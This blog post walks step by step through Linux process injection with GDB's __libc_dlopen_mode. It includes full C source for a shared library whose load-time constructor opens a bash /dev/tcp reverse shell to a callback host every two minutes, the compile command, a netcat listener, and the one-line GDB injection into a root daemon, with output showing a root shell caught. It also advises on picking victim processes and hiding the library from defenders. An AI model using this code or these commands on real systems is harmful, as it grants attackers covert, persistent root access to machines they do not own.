When GDB attaches to a process, the process is stopped. It’s best to script GDB’s actions beforehand, either with -x and --batch or echoing commands to GDB minimize the amount of time the process isn’t doing whatever it should be doing. If, for whatever reason, GDB doesn’t restart the process when it exits, sending the process SIGCONT should do the trick.

kill -CONT <PID>

Process Death

Once our library’s loaded and running, anything that goes wrong with it (e.g. segfaults) affects the entire process. Likewise, if it writes output or sends messages to syslog, they’ll show up as coming from the process. It’s not a bad idea to use the injected library as a loader to spawn actual malware in new proceses.

On Target

With all of that in mind, let’s look at how to do it. We’ll assume ssh access to a target, though in principle this can (should) all be scripted and can be run with shell/sql/file injection or whatever other method.

Process Selection

First step is to find a process into which to inject. Let’s look at a process listing, less kernel threads:

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# ps -fxo pid,user,args | egrep -v ' \[\S+\]$'
  PID USER     COMMAND
    1 root     /sbin/init
  625 root     /lib/systemd/systemd-journald
  664 root     /sbin/lvmetad -f
  696 root     /lib/systemd/systemd-udevd
 1266 root     /sbin/iscsid
 1267 root     /sbin/iscsid
 1273 root     /usr/lib/accountsservice/accounts-daemon
 1278 root     /usr/sbin/sshd -D
 1447 root      \_ sshd: root@pts/1
 1520 root          \_ -bash
 1538 root              \_ ps -fxo pid,user,args
 1539 root              \_ grep -E --color=auto -v  \[\S+\]$
 1282 root     /lib/systemd/systemd-logind
 1295 root     /usr/bin/lxcfs /var/lib/lxcfs/
 1298 root     /usr/sbin/acpid
 1312 root     /usr/sbin/cron -f
 1316 root     /usr/lib/snapd/snapd
 1356 root     /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
 1358 root     /usr/lib/policykit-1/polkitd --no-debug
 1413 root     /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
 1415 root     /sbin/agetty --noclear tty1 linux
 1449 root     /lib/systemd/systemd --user
 1451 root      \_ (sd-pam)

Some good choices in there. Ideally we’ll use a long-running process which nobody’s going to want to kill. Processes with low pids tend to work nicely, as they’re started early and nobody wants to find out what happens when they die. It’s helpful to inject into something running as root to avoid having to worry about permissions. Even better is a process that nobody wants to kill but which isn’t doing anything useful anyway.

In some cases, something short-lived, killable, and running as a user is good if the injected code only needs to run for a short time (e.g. something to survey the box, grab creds, and leave) or if there’s a good chance it’ll need to be stopped the hard way. It’s a judgement call.

We’ll use 664 root /sbin/lvmetad -f. It should be able to do anything we’d like and if something goes wrong we can restart it, probably without too much fuss.

Malware

More or less any linux shared object file can be injected. We’ll make a small one for demonstration purposes, but I’ve injected multi-megabyte backdoors written in Go as well. A lot of the fiddling that went into making this blog post was done using pcapknock.

For the sake of simplicity, we’ll use the following. Note that a lot of error handling has been elided for brevity. In practice, getting meaningful error output from injected libraries’ constructor functions isn’t as straightforward as a simple warn("something"); return; unless you really trust the standard error of your victim process.

#include <pthread.h>
#include <stdlib.h>
#include <unistd.h>

#define SLEEP  120                    /* Time to sleep between callbacks */
#define CBADDR "<REDACTED>"           /* Callback address */
#define CBPORT "4444"                 /* Callback port */

/* Reverse shell command */
#define CMD "echo 'exec >&/dev/tcp/"\
            CBADDR "/" CBPORT "; exec 0>&1' | /bin/bash"

void *callback(void *a);

__attribute__((constructor)) /* Run this function on library load */
void start_callbacks(){
        pthread_t tid;
        pthread_attr_t attr;

        /* Start thread detached */
        if (-1 == pthread_attr_init(&attr)) {
                return;
        }
        if (-1 == pthread_attr_setdetachstate(&attr,
                                PTHREAD_CREATE_DETACHED)) {
                return;
        }

        /* Spawn a thread to do the real work */
        pthread_create(&tid, &attr, callback, NULL);
}

/* callback tries to spawn a reverse shell every so often.  */
void *
callback(void *a)
{
        for (;;) {
                /* Try to spawn a reverse shell */
                system(CMD);
                /* Wait until next shell */
                sleep(SLEEP);
        }
        return NULL;
}

In a nutshell, this will spawn an unencrypted, unauthenticated reverse shell to a hardcoded address and port every couple of minutes. The __attribute__((constructor)) applied to start_callbacks() causes it to run when the library is loaded. All start_callbacks() does is spawn a thread to make reverse shells.

Building a library is similar to building any C program, except that -fPIC and -shared must be given to the compiler.

cc -O2 -fPIC -o libcallback.so ./callback.c -lpthread -shared

It’s not a bad idea to optimize the output with -O2 to maybe consume less CPU time. Of course, on a real engagement the injected library will be significantly more complex than this example.

Injection

Now that we have the injectable library created, we can do the deed. First thing to do is start a listener to catch the callbacks:

nc -nvl 4444 #OpenBSD netcat ftw!

__libc_dlopen_mode takes two arguments, the path to the library and flags as an integer. The path to the library will be visible, so it’s best to put it somewhere inconspicuous, like /usr/lib. We’ll use 2 for the flags, which corresponds to dlopen(3)’s RTLD_NOW. To get GDB to cause the process to run the function, we’ll use GDB’s print command, which conviently gives us the function’s return value. Instead of typing the command into GDB, which takes eons in program time, we’ll echo it into GDB’s standard input. This has the nice side-effect of causing GDB to exit without needing a quitcommand.

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# echo 'print __libc_dlopen_mode("/root/libcallback.so", 2)' | gdb -p 664
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
...snip...
0x00007f6ca1cf75d3 in select () at ../sysdeps/unix/syscall-template.S:84
84      ../sysdeps/unix/syscall-template.S: No such file or directory.
(gdb) [New Thread 0x7f6c9bfff700 (LWP 1590)]
$1 = 312536496
(gdb) quit
A debugging session is active.

        Inferior 1 [process 664] will be detached.

Quit anyway? (y or n) [answered Y; input not from terminal]
Detaching from program: /sbin/lvmetad, process 664

Checking netcat, we’ve caught the callback:

[stuart@c2server:/home/stuart]
$ nc -nvl 4444
Connection from <REDACTED> 50184 received!
ps -fxo pid,user,args
...snip...
  664 root     /sbin/lvmetad -f
 1591 root      \_ sh -c echo 'exec >&/dev/tcp/<REDACTED>/4444; exec 0>&1' | /bin/bash
 1593 root          \_ /bin/bash
 1620 root              \_ ps -fxo pid,user,args
...snip...

That’s it, we’ve got execution in another process.

If the injection had failed, we’d have seen $1 = 0, indicating__libc_dlopen_mode returned NULL.

Artifacts

There are several places defenders might catch us. The risk of detection can be minimized to a certain extent, but without a rootkit, there’s always some way to see we’ve done something. Of course, the best way to hide is to not raise suspicions in the first place.

Process listing

A process listing like the one above will show that the process into which we’ve injected malware has funny child processes. This can be avoided by either having the library doule-fork a child process to do the actual work or having the injected library do everything from within the victim process.

Files on disk

The loaded library has to start on disk, which leaves disk artifacts, and the original path to the library is visible in /proc/pid/maps:

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# cat /proc/664/maps                                                      
...snip...
7f6ca0650000-7f6ca0651000 r-xp 00000000 fd:01 61077    /root/libcallback.so                        
7f6ca0651000-7f6ca0850000 ---p 00001000 fd:01 61077    /root/libcallback.so                        
7f6ca0850000-7f6ca0851000 r--p 00000000 fd:01 61077    /root/libcallback.so
7f6ca0851000-7f6ca0852000 rw-p 00001000 fd:01 61077    /root/libcallback.so            
...snip...

If we delete the library, (deleted) is appended to the filename (i.e./root/libcallback.so (deleted)), which looks even weirder. This is somewhat mitigated by putting the library somewhere libraries normally live, like /usr/lib, and naming it something normal-looking.

Service disruption

Loading the library stops the running process for a short amount of time, and if the library causes process instability, it may crash the process or at least cause it to log warning messages (on a related note, don’t inject into systemd(1), it causes segfaults and makes shutdown(8) hang the box).

Process injection on Linux is reasonably easy:

  1. Write a library (shared object file) with a constructor.
  2. Load it with echo 'print __libc_dlopen_mode("/path/to/library.so", 2)' | gdb -p <PID>